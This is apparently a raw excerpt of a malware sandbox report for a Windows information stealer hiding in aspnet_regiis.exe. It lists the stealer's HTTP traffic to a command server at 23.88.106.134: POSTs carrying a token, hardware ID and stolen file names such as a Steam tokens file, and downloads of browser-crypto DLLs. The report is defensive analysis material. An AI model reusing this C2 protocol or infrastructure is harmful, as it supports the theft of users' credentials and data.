                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBGHost: 23.88.106.134Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 2d 2d 0d 0a Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"files------HDAFHIDGIJKJKECBGDBG--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 23.88.106.134Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 23.88.106.134Content-Length: 99115Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECHost: 23.88.106.134Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 2d 2d 0d 0a Data Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="message"jbdtaijovg------BAAFBFBAAKECFIEBFIEC--
                        Source: Joe Sandbox ViewASN Name: ENZUINC-US ENZUINC-US
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.106.134
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02755610 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/freebl3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/mozglue.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/msvcp140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/nss3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/softokn3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /566d6e1ec8db6394/vcruntime140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
                        Source: unknownHTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 23.88.106.134Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 31 39 36 30 37 37 37 34 43 43 36 36 31 31 37 39 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 75 61 70 66 73 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="hwid"8C19607774CC661179348------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="build"cuapfss------JJEGIJEGDBFHDGCAFCAE--
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/mozglue.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/softokn3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php)
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php6
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php?S
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpC
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpGS
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpcS
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpiSS
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpition:
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpm
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phppenSSH
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpwser
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpz
                        Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.88.106.134y
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                        Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824142050.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://mozilla.org0/
                        Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://support.mozilla.org
                        Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                        Source: aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                        Source: aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                        Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.drString found in binary or memory: https://www.mozilla.org
